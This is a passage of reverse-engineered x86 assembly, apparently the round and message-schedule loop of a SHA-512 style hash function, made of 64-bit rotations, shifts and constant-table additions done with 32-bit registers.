shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_41540D
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_118]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+80h], ecx
mov [eax+84h], edx
mov eax, edx
mov [esp+170h+var_D4], eax
mov [esp+170h+var_14], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_D8], ecx
mov [esp+170h+var_18], ecx
jmp short loc_415429
; ---------------------------------------------------------------------------
loc_41540D: ; CODE XREF: sub_4143D0+F41�j
mov edx, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov [esp+170h+var_18], edx
mov [esp+170h+var_14], ecx
loc_415429: ; CODE XREF: sub_4143D0+103B�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F980[eax*8]
adc esi, ds:dword_41F984[eax*8]
add edx, [esp+170h+var_18]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_14]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_415651
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_D0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_CC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_D0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
mov [eax+88h], ecx
mov [eax+8Ch], edx
mov eax, edx
mov [esp+170h+var_118], ecx
mov [esp+170h+var_114], eax
mov [esp+170h+var_48], ecx
jmp short loc_415660
; ---------------------------------------------------------------------------
loc_415651: ; CODE XREF: sub_4143D0+1196�j
mov edx, [esp+170h+var_118]
mov eax, [esp+170h+var_114]
mov [esp+170h+var_48], edx
loc_415660: ; CODE XREF: sub_4143D0+127F�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_44], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F988[eax*8]
adc esi, ds:dword_41F98C[eax*8]
add edx, [esp+170h+var_48]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_44]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edx, edx
or edx, ebp
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
and eax, [esp+170h+var_13C]
and ebp, [esp+170h+var_144]
and ecx, edx
xor ebx, ecx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
adc [esp+170h+var_154], esi
cmp [esp+170h+var_15C], 0
jz loc_41589B
mov eax, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+90h], ecx
mov [eax+94h], edx
mov eax, edx
mov [esp+170h+var_C8], ecx
mov [esp+170h+var_C4], eax
mov [esp+170h+var_80], ecx
jmp short loc_4158B0
; ---------------------------------------------------------------------------
loc_41589B: ; CODE XREF: sub_4143D0+13D4�j
mov edx, [esp+170h+var_C8]
mov eax, [esp+170h+var_C4]
mov [esp+170h+var_80], edx
loc_4158B0: ; CODE XREF: sub_4143D0+14C9�j
mov ecx, [esp+170h+var_134]
mov ebx, ecx
mov [esp+170h+var_7C], eax
mov eax, [esp+170h+var_138]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_130]
xor esi, ecx
mov ecx, [esp+170h+var_134]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not ebx
and ebx, [esp+170h+var_124]
not edi
and edi, [esp+170h+var_128]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F990[eax*8]
adc esi, ds:dword_41F994[eax*8]
add edx, [esp+170h+var_80]
mov eax, [esp+170h+var_120]
adc esi, [esp+170h+var_7C]
add eax, edx
adc ecx, esi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_158]
mov eax, [esp+170h+var_154]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_158]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_14C]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_150]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_158]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
mov ecx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_415AE1
mov eax, [esp+170h+var_E8]
mov ecx, [esp+170h+var_E4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_118]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+98h], ecx
mov [eax+9Ch], edx
mov eax, edx
mov [esp+170h+var_F0], ecx
mov [esp+170h+var_EC], eax
mov [esp+170h+var_78], ecx
jmp short loc_415AF6
; ---------------------------------------------------------------------------
loc_415AE1: ; CODE XREF: sub_4143D0+1626�j
mov edx, [esp+170h+var_F0]
mov eax, [esp+170h+var_EC]
mov [esp+170h+var_78], edx
loc_415AF6: ; CODE XREF: sub_4143D0+170F�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_74], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F998[eax*8]
adc esi, ds:dword_41F99C[eax*8]
add edx, [esp+170h+var_78]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_74]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_415D29
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
mov [eax+0A0h], ecx
mov [eax+0A4h], edx
mov eax, edx
mov [esp+170h+var_E8], ecx
mov [esp+170h+var_E4], eax
mov [esp+170h+var_68], ecx
jmp short loc_415D3E
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: sub_4143D0+1868�j
mov edx, [esp+170h+var_E8]
mov eax, [esp+170h+var_E4]
mov [esp+170h+var_68], edx
loc_415D3E: ; CODE XREF: sub_4143D0+1957�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_64], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A0[eax*8]
adc esi, ds:dword_41F9A4[eax*8]
add edx, [esp+170h+var_68]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_64]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_415F71
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
mov [eax+0A8h], ecx
mov [eax+0ACh], edx
mov eax, edx
mov [esp+170h+var_F8], ecx
mov [esp+170h+var_F4], eax
mov [esp+170h+var_50], ecx
jmp short loc_415F80
; ---------------------------------------------------------------------------
loc_415F71: ; CODE XREF: sub_4143D0+1AB0�j
mov edx, [esp+170h+var_F8]
mov eax, [esp+170h+var_F4]
mov [esp+170h+var_50], edx
loc_415F80: ; CODE XREF: sub_4143D0+1B9F�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_4C], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A8[eax*8]
adc esi, ds:dword_41F9AC[eax*8]
add edx, [esp+170h+var_50]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_4C]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_4161C3
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_E8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_E4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_E8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
mov [eax+0B0h], ecx
mov [eax+0B4h], edx
mov eax, edx
mov [esp+170h+var_B0], ecx
mov [esp+170h+var_AC], eax
mov [esp+170h+var_40], ecx
jmp short loc_4161D8
; ---------------------------------------------------------------------------
loc_4161C3: ; CODE XREF: sub_4143D0+1CF6�j
mov edx, [esp+170h+var_B0]
mov eax, [esp+170h+var_AC]
mov [esp+170h+var_40], edx
loc_4161D8: ; CODE XREF: sub_4143D0+1DF1�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_3C], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
